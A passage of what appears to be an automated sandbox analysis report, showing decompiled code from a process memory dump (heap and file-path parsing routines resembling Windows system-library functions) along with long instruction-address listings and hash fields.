														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E017EFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E017EF3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E017EF3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E01874CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E017FD130(_t427, _t494, _t511);
				}
			}










































































                                                      0x01875ba5
                                                      0x01875baa
                                                      0x01875baf
                                                      0x01875bb4
                                                      0x01875bb6
                                                      0x01875bbc
                                                      0x01875bbe
                                                      0x01875bc4
                                                      0x01875bcd
                                                      0x01875bd3
                                                      0x01875bd6
                                                      0x01875bdc
                                                      0x01875be0
                                                      0x01875be3
                                                      0x01875beb
                                                      0x01875bf2
                                                      0x01875bf8
                                                      0x01875bfe
                                                      0x01875c04
                                                      0x01875c0e
                                                      0x01875c18
                                                      0x01875c1f
                                                      0x01875c25
                                                      0x01875c2a
                                                      0x01875c2c
                                                      0x01875c32
                                                      0x01875c3a
                                                      0x01875c3f
                                                      0x01875c42
                                                      0x01875c48
                                                      0x01875c5b
                                                      0x01875c5b
                                                      0x01875c2c
                                                      0x01875cb7
                                                      0x01875cb9
                                                      0x01875cbf
                                                      0x01875cc2
                                                      0x01875cca
                                                      0x01875ccb
                                                      0x01875ccb
                                                      0x01875cd1
                                                      0x01875cd7
                                                      0x01875cda
                                                      0x01875ce1
                                                      0x01875ce4
                                                      0x01875ce7
                                                      0x01875ced
                                                      0x01875cf3
                                                      0x01875cf9
                                                      0x01875cff
                                                      0x01875d08
                                                      0x01875d0a
                                                      0x01875d0e
                                                      0x01875d10
                                                      0x00000000
                                                      0x00000000
                                                      0x01875d16
                                                      0x01875d1a
                                                      0x00000000
                                                      0x00000000
                                                      0x01875d20
                                                      0x01875d22
                                                      0x01875d25
                                                      0x01875d2f
                                                      0x01875d2f
                                                      0x01875d33
                                                      0x01875d3d
                                                      0x01875d49
                                                      0x01875d4b
                                                      0x00000000
                                                      0x00000000
                                                      0x01875d5a
                                                      0x01875d5d
                                                      0x01875d60
                                                      0x00000000
                                                      0x00000000
                                                      0x01875d66
                                                      0x01875d69
                                                      0x00000000
                                                      0x00000000
                                                      0x01875d6f
                                                      0x01875d6f
                                                      0x01875d73
                                                      0x01875d79
                                                      0x01875d7f
                                                      0x01875d86
                                                      0x01875d95
                                                      0x01875d98
                                                      0x01875dba
                                                      0x01875dcb
                                                      0x01875dce
                                                      0x01875dd3
                                                      0x01875dd6
                                                      0x01875dd8
                                                      0x01875de6
                                                      0x01875dec
                                                      0x01875dee
                                                      0x01875df1
                                                      0x01875df3
                                                      0x0187635a
                                                      0x0187635a
                                                      0x00000000
                                                      0x0187635a
                                                      0x01875dfe
                                                      0x01875e02
                                                      0x01875e05
                                                      0x01875e07
                                                      0x01875e10
                                                      0x01875e13
                                                      0x01875e1b
                                                      0x01875e1c
                                                      0x01875e21
                                                      0x01875e22
                                                      0x01875e23
                                                      0x01875e25
                                                      0x01875e2a
                                                      0x01875e2c
                                                      0x01875e2e
                                                      0x01875e36
                                                      0x01875e39
                                                      0x01875e42
                                                      0x01875e47
                                                      0x01875e4d
                                                      0x01875e54
                                                      0x01875e54
                                                      0x01875e54
                                                      0x01875e2e
                                                      0x01875e5c
                                                      0x01875e5f
                                                      0x01875e62
                                                      0x01875e64
                                                      0x01875e6b
                                                      0x01875e70
                                                      0x01875e7a
                                                      0x01875e7a
                                                      0x01875e7a
                                                      0x01875e6b
                                                      0x01875e7e
                                                      0x01875e7f
                                                      0x01875e7f
                                                      0x01875e81
                                                      0x01875e87
                                                      0x01875e8b
                                                      0x01875e8c
                                                      0x01875e8c
                                                      0x01875e8c
                                                      0x01875e9a
                                                      0x01875e9c
                                                      0x01875ea2
                                                      0x01875ea6
                                                      0x01875f50
                                                      0x01875f50
                                                      0x01875f57
                                                      0x01875f66
                                                      0x01875f66
                                                      0x01875f66
                                                      0x01875f68
                                                      0x01875f6a
                                                      0x018763d0
                                                      0x00000000
                                                      0x01875f70
                                                      0x01875f70
                                                      0x01875f91
                                                      0x01875f9c
                                                      0x01875f9e
                                                      0x01875fa4
                                                      0x01875fa6
                                                      0x0187638c
                                                      0x01876392
                                                      0x018763a1
                                                      0x018763a7
                                                      0x018763af
                                                      0x018763af
                                                      0x018763bd
                                                      0x018763d8
                                                      0x00000000
                                                      0x018763d8
                                                      0x01875fac
                                                      0x01875fb2
                                                      0x01875fb4
                                                      0x01875fbd
                                                      0x01875fc6
                                                      0x01875fce
                                                      0x01875fd4
                                                      0x01875fdc
                                                      0x01875fec
                                                      0x01875fed
                                                      0x01875fee
                                                      0x01875fef
                                                      0x01875ff9
                                                      0x01875ffa
                                                      0x01875ffb
                                                      0x01875ffc
                                                      0x01876000
                                                      0x01876004
                                                      0x01876012
                                                      0x01876012
                                                      0x01876018
                                                      0x01876019
                                                      0x0187601a
                                                      0x0187601b
                                                      0x0187601c
                                                      0x01876020
                                                      0x01876059
                                                      0x0187605c
                                                      0x01876061
                                                      0x01876061
                                                      0x01876022
                                                      0x01876022
                                                      0x01876022
                                                      0x01876025
                                                      0x0187602a
                                                      0x0187602b
                                                      0x01876031
                                                      0x01876037
                                                      0x01876038
                                                      0x0187603e
                                                      0x01876048
                                                      0x01876049
                                                      0x0187604a
                                                      0x0187604b
                                                      0x0187604c
                                                      0x0187604d
                                                      0x01876053
                                                      0x01876054
                                                      0x01876054
                                                      0x01876062
                                                      0x01876065
                                                      0x01876067
                                                      0x0187606a
                                                      0x01876070
                                                      0x01876075
                                                      0x01876076
                                                      0x01876081
                                                      0x01876087
                                                      0x01876095
                                                      0x01876099
                                                      0x0187609e
                                                      0x018760a4
                                                      0x018760ae
                                                      0x018760b0
                                                      0x018760b3
                                                      0x018760b6
                                                      0x018760b8
                                                      0x018760ba
                                                      0x018760ba
                                                      0x018760ba
                                                      0x018760ba
                                                      0x018760be
                                                      0x018760c0
                                                      0x018760c5
                                                      0x018760c5
                                                      0x018760c5
                                                      0x018760c6
                                                      0x018760cd
                                                      0x01876114
                                                      0x018760cf
                                                      0x018760cf
                                                      0x018760d4
                                                      0x018760d5
                                                      0x018760da
                                                      0x018760db
                                                      0x018760e1
                                                      0x018760e2
                                                      0x018760e8
                                                      0x018760f8
                                                      0x018760fd
                                                      0x018760fe
                                                      0x01876102
                                                      0x01876104
                                                      0x01876107
                                                      0x01876109
                                                      0x0187610b
                                                      0x0187610b
                                                      0x0187610b
                                                      0x0187610b
                                                      0x0187610f
                                                      0x0187610f
                                                      0x01876117
                                                      0x0187611a
                                                      0x0187611f
                                                      0x01876125
                                                      0x01876134
                                                      0x01876139
                                                      0x0187613f
                                                      0x01876146
                                                      0x01876148
                                                      0x0187614b
                                                      0x0187614d
                                                      0x0187614f
                                                      0x0187614f
                                                      0x0187614f
                                                      0x0187614f
                                                      0x01876153
                                                      0x01876159
                                                      0x01876159
                                                      0x0187615c
                                                      0x01876163
                                                      0x01876169
                                                      0x0187616c
                                                      0x01876172
                                                      0x01876181
                                                      0x01876186
                                                      0x01876187
                                                      0x0187618b
                                                      0x01876191
                                                      0x01876195
                                                      0x018761a3
                                                      0x018761bb
                                                      0x018761c0
                                                      0x018761c3
                                                      0x018761cc
                                                      0x018761d0
                                                      0x018761dc
                                                      0x018761de
                                                      0x018761e1
                                                      0x018761e4
                                                      0x018761e6
                                                      0x018761e8
                                                      0x018761e8
                                                      0x018761e8
                                                      0x018761e8
                                                      0x018761e6
                                                      0x018761ec
                                                      0x018761f3
                                                      0x01876203
                                                      0x01876209
                                                      0x0187620a
                                                      0x01876216
                                                      0x0187621d
                                                      0x01876227
                                                      0x01876241
                                                      0x01876246
                                                      0x0187624c
                                                      0x01876257
                                                      0x01876259
                                                      0x0187625c
                                                      0x0187625e
                                                      0x01876260
                                                      0x01876260
                                                      0x01876260
                                                      0x01876260
                                                      0x0187625e
                                                      0x01876264
                                                      0x01876267
                                                      0x01876269
                                                      0x01876315
                                                      0x01876315
                                                      0x0187631b
                                                      0x0187631e
                                                      0x01876324
                                                      0x01876327
                                                      0x0187632f
                                                      0x01876330
                                                      0x01876333
                                                      0x0187633a
                                                      0x0187633c
                                                      0x01876335
                                                      0x01876335
                                                      0x01876335
                                                      0x0187633f
                                                      0x01876342
                                                      0x0187634c
                                                      0x01876352
                                                      0x01876355
                                                      0x01876355
                                                      0x01876359
                                                      0x00000000
                                                      0x0187626f
                                                      0x01876275
                                                      0x01876275
                                                      0x01876278
                                                      0x0187627e
                                                      0x0187627e
                                                      0x01876281
                                                      0x01876287
                                                      0x0187628d
                                                      0x01876298
                                                      0x0187629c
                                                      0x018762a2
                                                      0x0187629e
                                                      0x0187629e
                                                      0x0187629e
                                                      0x018762a7
                                                      0x018762a7
                                                      0x018762aa
                                                      0x018762b0
                                                      0x018762f0
                                                      0x018762f0
                                                      0x018762f2
                                                      0x018762f8
                                                      0x018762fd
                                                      0x018762b2
                                                      0x018762b2
                                                      0x018762b2
                                                      0x018762b5
                                                      0x018762dd
                                                      0x018762e2
                                                      0x018762e5
                                                      0x018762b7
                                                      0x018762b8
                                                      0x018762bb
                                                      0x018762bd
                                                      0x018762c0
                                                      0x018762c4
                                                      0x018762cd
                                                      0x018762cd
                                                      0x018762c0
                                                      0x018762bb
                                                      0x018762b5
                                                      0x01876302
                                                      0x01876303
                                                      0x01876305
                                                      0x01876305
                                                      0x01876305
                                                      0x0187630c
                                                      0x0187630c
                                                      0x00000000
                                                      0x0187627e
                                                      0x01876269
                                                      0x01875eac
                                                      0x01875ebb
                                                      0x01875ebe
                                                      0x01875ecb
                                                      0x01875ecb
                                                      0x01875ece
                                                      0x01875ece
                                                      0x01875ed4
                                                      0x01875ed7
                                                      0x01875ed9
                                                      0x01875edb
                                                      0x01875edb
                                                      0x01875ee1
                                                      0x01875ee1
                                                      0x01875ee3
                                                      0x01875f20
                                                      0x01875f20
                                                      0x01875ee5
                                                      0x01875ee5
                                                      0x01875ee5
                                                      0x01875ee8
                                                      0x01875f11
                                                      0x01875f18
                                                      0x01875eea
                                                      0x01875eea
                                                      0x01875eed
                                                      0x01875ef2
                                                      0x01875ef8
                                                      0x01875efb
                                                      0x01875f0a
                                                      0x01875f0a
                                                      0x01875eed
                                                      0x01875ee8
                                                      0x01875f22
                                                      0x01875f28
                                                      0x00000000
                                                      0x00000000
                                                      0x01875f30
                                                      0x01875f31
                                                      0x01875f37
                                                      0x01875f3a
                                                      0x01875f3d
                                                      0x01875f44
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x01875f46
                                                      0x01875f48
                                                      0x01875f4d
                                                      0x00000000
                                                      0x01875f4d
                                                      0x01875dda
                                                      0x01875ddf
                                                      0x00000000
                                                      0x01875ddf
                                                      0x01875dd8
                                                      0x01875da7
                                                      0x01875da9
                                                      0x01875dac
                                                      0x01875dae
                                                      0x00000000
                                                      0x01875db4
                                                      0x01875db4
                                                      0x00000000
                                                      0x01875db4
                                                      0x01875dae
                                                      0x01875d88
                                                      0x01875d8d
                                                      0x01876363
                                                      0x01876369
                                                      0x0187636a
                                                      0x01876370
                                                      0x01876372
                                                      0x0187637a
                                                      0x0187637b
                                                      0x0187637d
                                                      0x00000000
                                                      0x00000000
                                                      0x0187637f
                                                      0x01876385
                                                      0x00000000
                                                      0x01876385
                                                      0x01875d38
                                                      0x01875d3b
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x01875d3b
                                                      0x01875d27
                                                      0x01875d29
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x01876360
                                                      0x00000000
                                                      0x01876360
                                                      0x01875c10
                                                      0x01875c10
                                                      0x018763da
                                                      0x018763e5
                                                      0x018763e5

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 25a16a7cefb93bc732ef87adb9415dfedd548531fb3ec733a67218f9169eda94
                                                      • Instruction ID: 9771333deee99479cd2b4da13564b013ac13bd8b2da58ae1ce6a2d1f72b94664
                                                      • Opcode Fuzzy Hash: 25a16a7cefb93bc732ef87adb9415dfedd548531fb3ec733a67218f9169eda94
                                                      • Instruction Fuzzy Hash: C2423C75900619CFEB25CF68C884BA9BBB1FF49304F1481AAD94DEB242E774DA85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017C4120, Relevance: .4, Instructions: 444COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 92%
                                                      			E017C4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x189d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E017DF232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E017C6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L017C4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E017C6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M017C45F8))) {
												case 0:
													_v568 = 0x1781078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x17811c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L017C4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E017EF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E017EF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E017A52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E017BEB70(1, 0x18979a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E017BAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E017E95D0();
																			L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E017EB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E017E3D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E017EB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                                      0x017c4128
                                                      0x017c4135
                                                      0x017c413c
                                                      0x017c4141
                                                      0x017c4145
                                                      0x017c4147
                                                      0x017c414e
                                                      0x017c4151
                                                      0x017c4159
                                                      0x017c415c
                                                      0x017c4160
                                                      0x017c4164
                                                      0x017c4168
                                                      0x017c416c
                                                      0x017c417f
                                                      0x017c4181
                                                      0x017c446a
                                                      0x017c446a
                                                      0x017c418c
                                                      0x017c4195
                                                      0x017c4199
                                                      0x017c4432
                                                      0x017c4439
                                                      0x017c443d
                                                      0x017c4442
                                                      0x017c4447
                                                      0x00000000
                                                      0x017c419f
                                                      0x017c41a3
                                                      0x017c41b1
                                                      0x017c41b9
                                                      0x017c41bd
